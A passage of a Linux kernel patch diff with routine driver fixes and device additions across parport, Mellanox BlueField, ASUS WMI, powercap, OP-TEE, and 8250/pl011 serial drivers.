+ 
+ static const struct pci_device_id parport_pc_pci_tbl[] = {
+@@ -2771,6 +2775,23 @@ static const struct pci_device_id parport_pc_pci_tbl[] = {
+ 	  PCI_ANY_ID, PCI_ANY_ID, 0, 0, quatech_sppxp100 },
+ 	/* WCH CH382L PCI-E single parallel port card */
+ 	{ 0x1c00, 0x3050, 0x1c00, 0x3050, 0, 0, wch_ch382l },
++	/* Brainboxes IX-500/550 */
++	{ PCI_VENDOR_ID_INTASHIELD, 0x402a,
++	  PCI_ANY_ID, PCI_ANY_ID, 0, 0, oxsemi_pcie_pport },
++	/* Brainboxes UC-146/UC-157 */
++	{ PCI_VENDOR_ID_INTASHIELD, 0x0be1,
++	  PCI_ANY_ID, PCI_ANY_ID, 0, 0, brainboxes_uc146 },
++	{ PCI_VENDOR_ID_INTASHIELD, 0x0be2,
++	  PCI_ANY_ID, PCI_ANY_ID, 0, 0, brainboxes_uc146 },
++	/* Brainboxes PX-146/PX-257 */
++	{ PCI_VENDOR_ID_INTASHIELD, 0x401c,
++	  PCI_ANY_ID, PCI_ANY_ID, 0, 0, oxsemi_pcie_pport },
++	/* Brainboxes PX-203 */
++	{ PCI_VENDOR_ID_INTASHIELD, 0x4007,
++	  PCI_ANY_ID, PCI_ANY_ID, 0, 0, brainboxes_px203 },
++	/* Brainboxes PX-475 */
++	{ PCI_VENDOR_ID_INTASHIELD, 0x401f,
++	  PCI_ANY_ID, PCI_ANY_ID, 0, 0, oxsemi_pcie_pport },
+ 	{ 0, } /* terminate list */
+ };
+ MODULE_DEVICE_TABLE(pci, parport_pc_pci_tbl);
+diff --git a/drivers/platform/mellanox/mlxbf-bootctl.c b/drivers/platform/mellanox/mlxbf-bootctl.c
+index 1c7a288b59a5c..6a171a4f9dc68 100644
+--- a/drivers/platform/mellanox/mlxbf-bootctl.c
++++ b/drivers/platform/mellanox/mlxbf-bootctl.c
+@@ -17,6 +17,7 @@
+ 
+ #define MLXBF_BOOTCTL_SB_SECURE_MASK		0x03
+ #define MLXBF_BOOTCTL_SB_TEST_MASK		0x0c
++#define MLXBF_BOOTCTL_SB_DEV_MASK		BIT(4)
+ 
+ #define MLXBF_SB_KEY_NUM			4
+ 
+@@ -37,11 +38,18 @@ static struct mlxbf_bootctl_name boot_names[] = {
+ 	{ MLXBF_BOOTCTL_NONE, "none" },
+ };
+ 
++enum {
++	MLXBF_BOOTCTL_SB_LIFECYCLE_PRODUCTION = 0,
++	MLXBF_BOOTCTL_SB_LIFECYCLE_GA_SECURE = 1,
++	MLXBF_BOOTCTL_SB_LIFECYCLE_GA_NON_SECURE = 2,
++	MLXBF_BOOTCTL_SB_LIFECYCLE_RMA = 3
++};
++
+ static const char * const mlxbf_bootctl_lifecycle_states[] = {
+-	[0] = "Production",
+-	[1] = "GA Secured",
+-	[2] = "GA Non-Secured",
+-	[3] = "RMA",
++	[MLXBF_BOOTCTL_SB_LIFECYCLE_PRODUCTION] = "Production",
++	[MLXBF_BOOTCTL_SB_LIFECYCLE_GA_SECURE] = "GA Secured",
++	[MLXBF_BOOTCTL_SB_LIFECYCLE_GA_NON_SECURE] = "GA Non-Secured",
++	[MLXBF_BOOTCTL_SB_LIFECYCLE_RMA] = "RMA",
+ };
+ 
+ /* ARM SMC call which is atomic and no need for lock. */
+@@ -165,25 +173,30 @@ static ssize_t second_reset_action_store(struct device *dev,
+ static ssize_t lifecycle_state_show(struct device *dev,
+ 				    struct device_attribute *attr, char *buf)
+ {
++	int status_bits;
++	int use_dev_key;
++	int test_state;
+ 	int lc_state;
+ 
+-	lc_state = mlxbf_bootctl_smc(MLXBF_BOOTCTL_GET_TBB_FUSE_STATUS,
+-				     MLXBF_BOOTCTL_FUSE_STATUS_LIFECYCLE);
+-	if (lc_state < 0)
+-		return lc_state;
++	status_bits = mlxbf_bootctl_smc(MLXBF_BOOTCTL_GET_TBB_FUSE_STATUS,
++					MLXBF_BOOTCTL_FUSE_STATUS_LIFECYCLE);
++	if (status_bits < 0)
++		return status_bits;
+ 
+-	lc_state &=
+-		MLXBF_BOOTCTL_SB_TEST_MASK | MLXBF_BOOTCTL_SB_SECURE_MASK;
++	use_dev_key = status_bits & MLXBF_BOOTCTL_SB_DEV_MASK;
++	test_state = status_bits & MLXBF_BOOTCTL_SB_TEST_MASK;
++	lc_state = status_bits & MLXBF_BOOTCTL_SB_SECURE_MASK;
+ 
+ 	/*
+ 	 * If the test bits are set, we specify that the current state may be
+ 	 * due to using the test bits.
+ 	 */
+-	if (lc_state & MLXBF_BOOTCTL_SB_TEST_MASK) {
+-		lc_state &= MLXBF_BOOTCTL_SB_SECURE_MASK;
+-
++	if (test_state) {
+ 		return sprintf(buf, "%s(test)\n",
+ 			       mlxbf_bootctl_lifecycle_states[lc_state]);
++	} else if (use_dev_key &&
++		   (lc_state == MLXBF_BOOTCTL_SB_LIFECYCLE_GA_SECURE)) {
++		return sprintf(buf, "Secured (development)\n");
+ 	}
+ 
+ 	return sprintf(buf, "%s\n", mlxbf_bootctl_lifecycle_states[lc_state]);
+diff --git a/drivers/platform/mellanox/mlxbf-pmc.c b/drivers/platform/mellanox/mlxbf-pmc.c
+index 2d4bbe99959ef..db7a1d360cd2c 100644
+--- a/drivers/platform/mellanox/mlxbf-pmc.c
++++ b/drivers/platform/mellanox/mlxbf-pmc.c
+@@ -1202,6 +1202,8 @@ static int mlxbf_pmc_init_perftype_counter(struct device *dev, int blk_num)
+ 	attr->dev_attr.show = mlxbf_pmc_event_list_show;
+ 	attr->nr = blk_num;
+ 	attr->dev_attr.attr.name = devm_kasprintf(dev, GFP_KERNEL, "event_list");
++	if (!attr->dev_attr.attr.name)
++		return -ENOMEM;
+ 	pmc->block[blk_num].block_attr[i] = &attr->dev_attr.attr;
+ 	attr = NULL;
+ 
+@@ -1214,6 +1216,8 @@ static int mlxbf_pmc_init_perftype_counter(struct device *dev, int blk_num)
+ 		attr->nr = blk_num;
+ 		attr->dev_attr.attr.name = devm_kasprintf(dev, GFP_KERNEL,
+ 							  "enable");
++		if (!attr->dev_attr.attr.name)
++			return -ENOMEM;
+ 		pmc->block[blk_num].block_attr[++i] = &attr->dev_attr.attr;
+ 		attr = NULL;
+ 	}
+@@ -1240,6 +1244,8 @@ static int mlxbf_pmc_init_perftype_counter(struct device *dev, int blk_num)
+ 		attr->nr = blk_num;
+ 		attr->dev_attr.attr.name = devm_kasprintf(dev, GFP_KERNEL,
+ 							  "counter%d", j);
++		if (!attr->dev_attr.attr.name)
++			return -ENOMEM;
+ 		pmc->block[blk_num].block_attr[++i] = &attr->dev_attr.attr;
+ 		attr = NULL;
+ 
+@@ -1251,6 +1257,8 @@ static int mlxbf_pmc_init_perftype_counter(struct device *dev, int blk_num)
+ 		attr->nr = blk_num;
+ 		attr->dev_attr.attr.name = devm_kasprintf(dev, GFP_KERNEL,
+ 							  "event%d", j);
++		if (!attr->dev_attr.attr.name)
++			return -ENOMEM;
+ 		pmc->block[blk_num].block_attr[++i] = &attr->dev_attr.attr;
+ 		attr = NULL;
+ 	}
+@@ -1283,6 +1291,8 @@ static int mlxbf_pmc_init_perftype_reg(struct device *dev, int blk_num)
+ 		attr->nr = blk_num;
+ 		attr->dev_attr.attr.name = devm_kasprintf(dev, GFP_KERNEL,
+ 							  events[j].evt_name);
++		if (!attr->dev_attr.attr.name)
++			return -ENOMEM;
+ 		pmc->block[blk_num].block_attr[i] = &attr->dev_attr.attr;
+ 		attr = NULL;
+ 		i++;
+@@ -1311,6 +1321,8 @@ static int mlxbf_pmc_create_groups(struct device *dev, int blk_num)
+ 	pmc->block[blk_num].block_attr_grp.attrs = pmc->block[blk_num].block_attr;
+ 	pmc->block[blk_num].block_attr_grp.name = devm_kasprintf(
+ 		dev, GFP_KERNEL, pmc->block_name[blk_num]);
++	if (!pmc->block[blk_num].block_attr_grp.name)
++		return -ENOMEM;
+ 	pmc->groups[blk_num] = &pmc->block[blk_num].block_attr_grp;
+ 
+ 	return 0;
+@@ -1442,6 +1454,8 @@ static int mlxbf_pmc_probe(struct platform_device *pdev)
+ 
+ 	pmc->hwmon_dev = devm_hwmon_device_register_with_groups(
+ 		dev, "bfperf", pmc, pmc->groups);
++	if (IS_ERR(pmc->hwmon_dev))
++		return PTR_ERR(pmc->hwmon_dev);
+ 	platform_set_drvdata(pdev, pmc);
+ 
+ 	return 0;
+diff --git a/drivers/platform/surface/aggregator/core.c b/drivers/platform/surface/aggregator/core.c
+index 1a6373dea109c..6152be38398c4 100644
+--- a/drivers/platform/surface/aggregator/core.c
++++ b/drivers/platform/surface/aggregator/core.c
+@@ -231,9 +231,12 @@ static int ssam_receive_buf(struct serdev_device *dev, const unsigned char *buf,
+ 			    size_t n)
+ {
+ 	struct ssam_controller *ctrl;
++	int ret;
+ 
+ 	ctrl = serdev_device_get_drvdata(dev);
+-	return ssam_controller_receive_buf(ctrl, buf, n);
++	ret = ssam_controller_receive_buf(ctrl, buf, n);
++
++	return ret < 0 ? 0 : ret;
+ }
+ 
+ static void ssam_write_wakeup(struct serdev_device *dev)
+diff --git a/drivers/platform/x86/Kconfig b/drivers/platform/x86/Kconfig
+index 1396a839dd8a4..d5acef3202dad 100644
+--- a/drivers/platform/x86/Kconfig
++++ b/drivers/platform/x86/Kconfig
+@@ -271,6 +271,7 @@ config ASUS_WMI
+ 	depends on RFKILL || RFKILL = n
+ 	depends on HOTPLUG_PCI
+ 	depends on ACPI_VIDEO || ACPI_VIDEO = n
++	depends on SERIO_I8042 || SERIO_I8042 = n
+ 	select INPUT_SPARSEKMAP
+ 	select LEDS_CLASS
+ 	select NEW_LEDS
+@@ -287,7 +288,6 @@ config ASUS_WMI
+ config ASUS_NB_WMI
+ 	tristate "Asus Notebook WMI Driver"
+ 	depends on ASUS_WMI
+-	depends on SERIO_I8042 || SERIO_I8042 = n
+ 	help
+ 	  This is a driver for newer Asus notebooks. It adds extra features
+ 	  like wireless radio and bluetooth control, leds, hotkeys, backlight...
+diff --git a/drivers/platform/x86/asus-nb-wmi.c b/drivers/platform/x86/asus-nb-wmi.c
+index df1db54d4e183..af3da303e2b15 100644
+--- a/drivers/platform/x86/asus-nb-wmi.c
++++ b/drivers/platform/x86/asus-nb-wmi.c
+@@ -501,8 +501,6 @@ static const struct dmi_system_id asus_quirks[] = {
+ 
+ static void asus_nb_wmi_quirks(struct asus_wmi_driver *driver)
+ {
+-	int ret;
+-
+ 	quirks = &quirk_asus_unknown;
+ 	dmi_check_system(asus_quirks);
+ 
+@@ -517,15 +515,6 @@ static void asus_nb_wmi_quirks(struct asus_wmi_driver *driver)
+ 
+ 	if (tablet_mode_sw != -1)
+ 		quirks->tablet_switch_mode = tablet_mode_sw;
+-
+-	if (quirks->i8042_filter) {
+-		ret = i8042_install_filter(quirks->i8042_filter);
+-		if (ret) {
+-			pr_warn("Unable to install key filter\n");
+-			return;
+-		}
+-		pr_info("Using i8042 filter function for receiving events\n");
+-	}
+ }
+ 
+ static const struct key_entry asus_nb_wmi_keymap[] = {
+diff --git a/drivers/platform/x86/asus-wmi.c b/drivers/platform/x86/asus-wmi.c
+index 49dd55b8e8faf..296150eaef929 100644
+--- a/drivers/platform/x86/asus-wmi.c
++++ b/drivers/platform/x86/asus-wmi.c
+@@ -3839,6 +3839,12 @@ static int asus_wmi_add(struct platform_device *pdev)
+ 		goto fail_wmi_handler;
+ 	}
+ 
++	if (asus->driver->quirks->i8042_filter) {
++		err = i8042_install_filter(asus->driver->quirks->i8042_filter);
++		if (err)
++			pr_warn("Unable to install key filter - %d\n", err);
++	}
++
+ 	asus_wmi_battery_init(asus);
+ 
+ 	asus_wmi_debugfs_init(asus);
+@@ -3873,6 +3879,8 @@ static int asus_wmi_remove(struct platform_device *device)
+ 	struct asus_wmi *asus;
+ 
+ 	asus = platform_get_drvdata(device);
++	if (asus->driver->quirks->i8042_filter)
++		i8042_remove_filter(asus->driver->quirks->i8042_filter);
+ 	wmi_remove_notify_handler(asus->driver->event_guid);
+ 	asus_wmi_backlight_exit(asus);
+ 	asus_wmi_input_exit(asus);
+diff --git a/drivers/platform/x86/wmi.c b/drivers/platform/x86/wmi.c
+index 2b79377cc21e2..b3f3e23a64eee 100644
+--- a/drivers/platform/x86/wmi.c
++++ b/drivers/platform/x86/wmi.c
+@@ -1227,6 +1227,11 @@ static int parse_wdg(struct device *wmi_bus_dev, struct acpi_device *device)
+ 		if (debug_dump_wdg)
+ 			wmi_dump_wdg(&gblock[i]);
+ 
++		if (!gblock[i].instance_count) {
++			dev_info(wmi_bus_dev, FW_INFO "%pUL has zero instances\n", &gblock[i].guid);
++			continue;
++		}
++
+ 		if (guid_already_parsed_for_legacy(device, &gblock[i].guid))
+ 			continue;
+ 
+diff --git a/drivers/powercap/dtpm_cpu.c b/drivers/powercap/dtpm_cpu.c
+index 8a2f18fa3faf5..9193c3b8edebe 100644
+--- a/drivers/powercap/dtpm_cpu.c
++++ b/drivers/powercap/dtpm_cpu.c
+@@ -140,6 +140,8 @@ static void pd_release(struct dtpm *dtpm)
+ 	if (policy) {
+ 		for_each_cpu(dtpm_cpu->cpu, policy->related_cpus)
+ 			per_cpu(dtpm_per_cpu, dtpm_cpu->cpu) = NULL;
++
++		cpufreq_cpu_put(policy);
+ 	}
+ 	
+ 	kfree(dtpm_cpu);
+@@ -191,12 +193,16 @@ static int __dtpm_cpu_setup(int cpu, struct dtpm *parent)
+ 		return 0;
+ 
+ 	pd = em_cpu_get(cpu);
+-	if (!pd || em_is_artificial(pd))
+-		return -EINVAL;
++	if (!pd || em_is_artificial(pd)) {
++		ret = -EINVAL;
++		goto release_policy;
++	}
+ 
+ 	dtpm_cpu = kzalloc(sizeof(*dtpm_cpu), GFP_KERNEL);
+-	if (!dtpm_cpu)
+-		return -ENOMEM;
++	if (!dtpm_cpu) {
++		ret = -ENOMEM;
++		goto release_policy;
++	}
+ 
+ 	dtpm_init(&dtpm_cpu->dtpm, &dtpm_ops);
+ 	dtpm_cpu->cpu = cpu;
+@@ -216,6 +222,7 @@ static int __dtpm_cpu_setup(int cpu, struct dtpm *parent)
+ 	if (ret)
+ 		goto out_dtpm_unregister;
+ 
++	cpufreq_cpu_put(policy);
+ 	return 0;
+ 
+ out_dtpm_unregister:
+@@ -227,6 +234,8 @@ out_kfree_dtpm_cpu:
+ 		per_cpu(dtpm_per_cpu, cpu) = NULL;
+ 	kfree(dtpm_cpu);
+ 
++release_policy:
++	cpufreq_cpu_put(policy);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/scsi/be2iscsi/be_main.c b/drivers/scsi/be2iscsi/be_main.c
+index 50a577ac3bb42..b6df0d4319072 100644
+--- a/drivers/scsi/be2iscsi/be_main.c
++++ b/drivers/scsi/be2iscsi/be_main.c
+@@ -2710,6 +2710,7 @@ init_wrb_hndl_failed:
+ 		kfree(pwrb_context->pwrb_handle_base);
+ 		kfree(pwrb_context->pwrb_handle_basestd);
+ 	}
++	kfree(phwi_ctxt->be_wrbq);
+ 	return -ENOMEM;
+ }
+ 
+diff --git a/drivers/tee/optee/device.c b/drivers/tee/optee/device.c
+index 64f0e047c23d2..4b10921276942 100644
+--- a/drivers/tee/optee/device.c
++++ b/drivers/tee/optee/device.c
+@@ -60,7 +60,16 @@ static void optee_release_device(struct device *dev)
+ 	kfree(optee_device);
+ }
+ 
+-static int optee_register_device(const uuid_t *device_uuid)
++static ssize_t need_supplicant_show(struct device *dev,
++				    struct device_attribute *attr,
++				    char *buf)
++{
++	return 0;
++}
++
++static DEVICE_ATTR_RO(need_supplicant);
++
++static int optee_register_device(const uuid_t *device_uuid, u32 func)
+ {
+ 	struct tee_client_device *optee_device = NULL;
+ 	int rc;
+@@ -83,6 +92,10 @@ static int optee_register_device(const uuid_t *device_uuid)
+ 		put_device(&optee_device->dev);
+ 	}
+ 
++	if (func == PTA_CMD_GET_DEVICES_SUPP)
++		device_create_file(&optee_device->dev,
++				   &dev_attr_need_supplicant);
++
+ 	return rc;
+ }
+ 
+@@ -142,7 +155,7 @@ static int __optee_enumerate_devices(u32 func)
+ 	num_devices = shm_size / sizeof(uuid_t);
+ 
+ 	for (idx = 0; idx < num_devices; idx++) {
+-		rc = optee_register_device(&device_uuid[idx]);
++		rc = optee_register_device(&device_uuid[idx], func);
+ 		if (rc)
+ 			goto out_shm;
+ 	}
+diff --git a/drivers/tty/serial/8250/8250_dw.c b/drivers/tty/serial/8250/8250_dw.c
+index 7db51781289ed..88035100b86c6 100644
+--- a/drivers/tty/serial/8250/8250_dw.c
++++ b/drivers/tty/serial/8250/8250_dw.c
+@@ -795,6 +795,7 @@ static const struct acpi_device_id dw8250_acpi_match[] = {
+ 	{ "INT33C5", (kernel_ulong_t)&dw8250_dw_apb },
+ 	{ "INT3434", (kernel_ulong_t)&dw8250_dw_apb },
+ 	{ "INT3435", (kernel_ulong_t)&dw8250_dw_apb },
++	{ "INTC10EE", (kernel_ulong_t)&dw8250_dw_apb },
+ 	{ },
+ };
+ MODULE_DEVICE_TABLE(acpi, dw8250_acpi_match);
+diff --git a/drivers/tty/serial/8250/8250_early.c b/drivers/tty/serial/8250/8250_early.c
+index f271becfc46c1..02c9b98a6bbf1 100644
+--- a/drivers/tty/serial/8250/8250_early.c
++++ b/drivers/tty/serial/8250/8250_early.c
+@@ -197,6 +197,7 @@ static int __init early_omap8250_setup(struct earlycon_device *device,
+ OF_EARLYCON_DECLARE(omap8250, "ti,omap2-uart", early_omap8250_setup);
+ OF_EARLYCON_DECLARE(omap8250, "ti,omap3-uart", early_omap8250_setup);
+ OF_EARLYCON_DECLARE(omap8250, "ti,omap4-uart", early_omap8250_setup);
++OF_EARLYCON_DECLARE(omap8250, "ti,am654-uart", early_omap8250_setup);
+ 
+ #endif
+ 
+diff --git a/drivers/tty/serial/8250/8250_omap.c b/drivers/tty/serial/8250/8250_omap.c
+index 2e21f74a24705..0b04d810b3e61 100644
+--- a/drivers/tty/serial/8250/8250_omap.c
++++ b/drivers/tty/serial/8250/8250_omap.c
+@@ -825,7 +825,7 @@ static void __dma_rx_do_complete(struct uart_8250_port *p)
+ 	if (priv->habit & UART_HAS_RHR_IT_DIS) {
+ 		reg = serial_in(p, UART_OMAP_IER2);
+ 		reg &= ~UART_OMAP_IER2_RHR_IT_DIS;
+-		serial_out(p, UART_OMAP_IER2, UART_OMAP_IER2_RHR_IT_DIS);
++		serial_out(p, UART_OMAP_IER2, reg);
+ 	}
+ 
+ 	dmaengine_tx_status(rxchan, cookie, &state);
+@@ -967,7 +967,7 @@ static int omap_8250_rx_dma(struct uart_8250_port *p)
+ 	if (priv->habit & UART_HAS_RHR_IT_DIS) {
+ 		reg = serial_in(p, UART_OMAP_IER2);
+ 		reg |= UART_OMAP_IER2_RHR_IT_DIS;
+-		serial_out(p, UART_OMAP_IER2, UART_OMAP_IER2_RHR_IT_DIS);
++		serial_out(p, UART_OMAP_IER2, reg);
+ 	}
+ 
+ 	dma_async_issue_pending(dma->rxchan);
+@@ -1186,10 +1186,12 @@ static int omap_8250_dma_handle_irq(struct uart_port *port)
+ 
+ 	status = serial_port_in(port, UART_LSR);
+ 
+-	if (priv->habit & UART_HAS_EFR2)
+-		am654_8250_handle_rx_dma(up, iir, status);
+-	else
+-		status = omap_8250_handle_rx_dma(up, iir, status);
++	if ((iir & 0x3f) != UART_IIR_THRI) {
++		if (priv->habit & UART_HAS_EFR2)
++			am654_8250_handle_rx_dma(up, iir, status);
++		else
++			status = omap_8250_handle_rx_dma(up, iir, status);
++	}
+ 
+ 	serial8250_modem_status(up);
+ 	if (status & UART_LSR_THRE && up->dma->tx_err) {
+diff --git a/drivers/tty/serial/amba-pl011.c b/drivers/tty/serial/amba-pl011.c
+index 0a1cc36f93aa7..c74eaf2552c32 100644
+--- a/drivers/tty/serial/amba-pl011.c
++++ b/drivers/tty/serial/amba-pl011.c
+@@ -218,17 +218,18 @@ static struct vendor_data vendor_st = {
+ 
+ /* Deals with DMA transactions */
+ 
+-struct pl011_sgbuf {
+-	struct scatterlist sg;
+-	char *buf;
++struct pl011_dmabuf {
++	dma_addr_t		dma;
++	size_t			len;
++	char			*buf;
+ };
+ 
+ struct pl011_dmarx_data {
+ 	struct dma_chan		*chan;
+ 	struct completion	complete;
+ 	bool			use_buf_b;
+-	struct pl011_sgbuf	sgbuf_a;
+-	struct pl011_sgbuf	sgbuf_b;
++	struct pl011_dmabuf	dbuf_a;
++	struct pl011_dmabuf	dbuf_b;
+ 	dma_cookie_t		cookie;
+ 	bool			running;
+ 	struct timer_list	timer;
+@@ -241,7 +242,8 @@ struct pl011_dmarx_data {
+ 
+ struct pl011_dmatx_data {
+ 	struct dma_chan		*chan;
+-	struct scatterlist	sg;
++	dma_addr_t		dma;
++	size_t			len;
+ 	char			*buf;
+ 	bool			queued;
+ };
+@@ -365,32 +367,24 @@ static int pl011_fifo_to_tty(struct uart_amba_port *uap)
+ 
+ #define PL011_DMA_BUFFER_SIZE PAGE_SIZE
+ 
+-static int pl011_sgbuf_init(struct dma_chan *chan, struct pl011_sgbuf *sg,
++static int pl011_dmabuf_init(struct dma_chan *chan, struct pl011_dmabuf *db,
+ 	enum dma_data_direction dir)
+ {
+-	dma_addr_t dma_addr;
+-
+-	sg->buf = dma_alloc_coherent(chan->device->dev,
+-		PL011_DMA_BUFFER_SIZE, &dma_addr, GFP_KERNEL);
+-	if (!sg->buf)
++	db->buf = dma_alloc_coherent(chan->device->dev, PL011_DMA_BUFFER_SIZE,
++				     &db->dma, GFP_KERNEL);
++	if (!db->buf)
+ 		return -ENOMEM;
+-
+-	sg_init_table(&sg->sg, 1);
+-	sg_set_page(&sg->sg, phys_to_page(dma_addr),
+-		PL011_DMA_BUFFER_SIZE, offset_in_page(dma_addr));
+-	sg_dma_address(&sg->sg) = dma_addr;
+-	sg_dma_len(&sg->sg) = PL011_DMA_BUFFER_SIZE;
++	db->len = PL011_DMA_BUFFER_SIZE;
+ 
+ 	return 0;
+ }
+ 
+-static void pl011_sgbuf_free(struct dma_chan *chan, struct pl011_sgbuf *sg,
++static void pl011_dmabuf_free(struct dma_chan *chan, struct pl011_dmabuf *db,
+ 	enum dma_data_direction dir)
+ {
+-	if (sg->buf) {
++	if (db->buf) {
+ 		dma_free_coherent(chan->device->dev,
+-			PL011_DMA_BUFFER_SIZE, sg->buf,
+-			sg_dma_address(&sg->sg));
++				  PL011_DMA_BUFFER_SIZE, db->buf, db->dma);
+ 	}
+ }
+ 
+@@ -551,8 +545,8 @@ static void pl011_dma_tx_callback(void *data)
+ 
+ 	spin_lock_irqsave(&uap->port.lock, flags);
+ 	if (uap->dmatx.queued)
+-		dma_unmap_sg(dmatx->chan->device->dev, &dmatx->sg, 1,
+-			     DMA_TO_DEVICE);
++		dma_unmap_single(dmatx->chan->device->dev, dmatx->dma,
++				dmatx->len, DMA_TO_DEVICE);
+ 
+ 	dmacr = uap->dmacr;
+ 	uap->dmacr = dmacr & ~UART011_TXDMAE;
+@@ -638,18 +632,19 @@ static int pl011_dma_tx_refill(struct uart_amba_port *uap)
+ 			memcpy(&dmatx->buf[first], &xmit->buf[0], second);
+ 	}
+ 
+-	dmatx->sg.length = count;
+-
+-	if (dma_map_sg(dma_dev->dev, &dmatx->sg, 1, DMA_TO_DEVICE) != 1) {
++	dmatx->len = count;
++	dmatx->dma = dma_map_single(dma_dev->dev, dmatx->buf, count,
++				    DMA_TO_DEVICE);
++	if (dmatx->dma == DMA_MAPPING_ERROR) {
+ 		uap->dmatx.queued = false;
+ 		dev_dbg(uap->port.dev, "unable to map TX DMA\n");
+ 		return -EBUSY;
+ 	}
+ 
+-	desc = dmaengine_prep_slave_sg(chan, &dmatx->sg, 1, DMA_MEM_TO_DEV,
++	desc = dmaengine_prep_slave_single(chan, dmatx->dma, dmatx->len, DMA_MEM_TO_DEV,
+ 					     DMA_PREP_INTERRUPT | DMA_CTRL_ACK);
+ 	if (!desc) {
+-		dma_unmap_sg(dma_dev->dev, &dmatx->sg, 1, DMA_TO_DEVICE);
++		dma_unmap_single(dma_dev->dev, dmatx->dma, dmatx->len, DMA_TO_DEVICE);
+ 		uap->dmatx.queued = false;
+ 		/*
+ 		 * If DMA cannot be used right now, we complete this
+@@ -813,8 +808,8 @@ __acquires(&uap->port.lock)
+ 	dmaengine_terminate_async(uap->dmatx.chan);
+ 
+ 	if (uap->dmatx.queued) {
+-		dma_unmap_sg(uap->dmatx.chan->device->dev, &uap->dmatx.sg, 1,
+-			     DMA_TO_DEVICE);
++		dma_unmap_single(uap->dmatx.chan->device->dev, uap->dmatx.dma,
++				 uap->dmatx.len, DMA_TO_DEVICE);
+ 		uap->dmatx.queued = false;
+ 		uap->dmacr &= ~UART011_TXDMAE;
+ 		pl011_write(uap->dmacr, uap, REG_DMACR);
+@@ -828,15 +823,15 @@ static int pl011_dma_rx_trigger_dma(struct uart_amba_port *uap)
+ 	struct dma_chan *rxchan = uap->dmarx.chan;
+ 	struct pl011_dmarx_data *dmarx = &uap->dmarx;
+ 	struct dma_async_tx_descriptor *desc;
+-	struct pl011_sgbuf *sgbuf;
++	struct pl011_dmabuf *dbuf;
+ 
+ 	if (!rxchan)
+ 		return -EIO;
+ 
+ 	/* Start the RX DMA job */
+-	sgbuf = uap->dmarx.use_buf_b ?
+-		&uap->dmarx.sgbuf_b : &uap->dmarx.sgbuf_a;
+-	desc = dmaengine_prep_slave_sg(rxchan, &sgbuf->sg, 1,
++	dbuf = uap->dmarx.use_buf_b ?
++		&uap->dmarx.dbuf_b : &uap->dmarx.dbuf_a;
++	desc = dmaengine_prep_slave_single(rxchan, dbuf->dma, dbuf->len,
+ 					DMA_DEV_TO_MEM,
+ 					DMA_PREP_INTERRUPT | DMA_CTRL_ACK);
+ 	/*
+@@ -876,8 +871,8 @@ static void pl011_dma_rx_chars(struct uart_amba_port *uap,
+ 			       bool readfifo)
+ {
+ 	struct tty_port *port = &uap->port.state->port;
+-	struct pl011_sgbuf *sgbuf = use_buf_b ?
+-		&uap->dmarx.sgbuf_b : &uap->dmarx.sgbuf_a;
++	struct pl011_dmabuf *dbuf = use_buf_b ?
++		&uap->dmarx.dbuf_b : &uap->dmarx.dbuf_a;
+ 	int dma_count = 0;
+ 	u32 fifotaken = 0; /* only used for vdbg() */
+ 
+@@ -886,7 +881,7 @@ static void pl011_dma_rx_chars(struct uart_amba_port *uap,
+ 
+ 	if (uap->dmarx.poll_rate) {
+ 		/* The data can be taken by polling */
+-		dmataken = sgbuf->sg.length - dmarx->last_residue;
++		dmataken = dbuf->len - dmarx->last_residue;
+ 		/* Recalculate the pending size */
+ 		if (pending >= dmataken)
+ 			pending -= dmataken;
+@@ -900,7 +895,7 @@ static void pl011_dma_rx_chars(struct uart_amba_port *uap,
+ 		 * Note that tty_insert_flip_buf() tries to take as many chars
+ 		 * as it can.
+ 		 */
+-		dma_count = tty_insert_flip_string(port, sgbuf->buf + dmataken,
++		dma_count = tty_insert_flip_string(port, dbuf->buf + dmataken,
+ 				pending);
+ 
+ 		uap->port.icount.rx += dma_count;
+@@ -911,7 +906,7 @@ static void pl011_dma_rx_chars(struct uart_amba_port *uap,
+ 
+ 	/* Reset the last_residue for Rx DMA poll */
+ 	if (uap->dmarx.poll_rate)
+-		dmarx->last_residue = sgbuf->sg.length;
++		dmarx->last_residue = dbuf->len;
+ 
+ 	/*
+ 	 * Only continue with trying to read the FIFO if all DMA chars have
+@@ -946,8 +941,8 @@ static void pl011_dma_rx_irq(struct uart_amba_port *uap)
+ {
+ 	struct pl011_dmarx_data *dmarx = &uap->dmarx;
+ 	struct dma_chan *rxchan = dmarx->chan;
+-	struct pl011_sgbuf *sgbuf = dmarx->use_buf_b ?
+-		&dmarx->sgbuf_b : &dmarx->sgbuf_a;
++	struct pl011_dmabuf *dbuf = dmarx->use_buf_b ?
++		&dmarx->dbuf_b : &dmarx->dbuf_a;
+ 	size_t pending;
+ 	struct dma_tx_state state;
+ 	enum dma_status dmastat;
+@@ -969,7 +964,7 @@ static void pl011_dma_rx_irq(struct uart_amba_port *uap)
+ 	pl011_write(uap->dmacr, uap, REG_DMACR);
+ 	uap->dmarx.running = false;
+ 
+-	pending = sgbuf->sg.length - state.residue;
++	pending = dbuf->len - state.residue;
+ 	BUG_ON(pending > PL011_DMA_BUFFER_SIZE);
+ 	/* Then we terminate the transfer - we now know our residue */
+ 	dmaengine_terminate_all(rxchan);
+@@ -996,8 +991,8 @@ static void pl011_dma_rx_callback(void *data)
+ 	struct pl011_dmarx_data *dmarx = &uap->dmarx;
+ 	struct dma_chan *rxchan = dmarx->chan;
+ 	bool lastbuf = dmarx->use_buf_b;
+-	struct pl011_sgbuf *sgbuf = dmarx->use_buf_b ?
+-		&dmarx->sgbuf_b : &dmarx->sgbuf_a;
++	struct pl011_dmabuf *dbuf = dmarx->use_buf_b ?
++		&dmarx->dbuf_b : &dmarx->dbuf_a;
+ 	size_t pending;
+ 	struct dma_tx_state state;
+ 	int ret;
+@@ -1015,7 +1010,7 @@ static void pl011_dma_rx_callback(void *data)
+ 	 * the DMA irq handler. So we check the residue here.
+ 	 */
+ 	rxchan->device->device_tx_status(rxchan, dmarx->cookie, &state);
+-	pending = sgbuf->sg.length - state.residue;
++	pending = dbuf->len - state.residue;
+ 	BUG_ON(pending > PL011_DMA_BUFFER_SIZE);
+ 	/* Then we terminate the transfer - we now know our residue */
+ 	dmaengine_terminate_all(rxchan);
+@@ -1067,16 +1062,16 @@ static void pl011_dma_rx_poll(struct timer_list *t)
+ 	unsigned long flags;
+ 	unsigned int dmataken = 0;
+ 	unsigned int size = 0;
+-	struct pl011_sgbuf *sgbuf;
++	struct pl011_dmabuf *dbuf;
+ 	int dma_count;
+ 	struct dma_tx_state state;
+ 
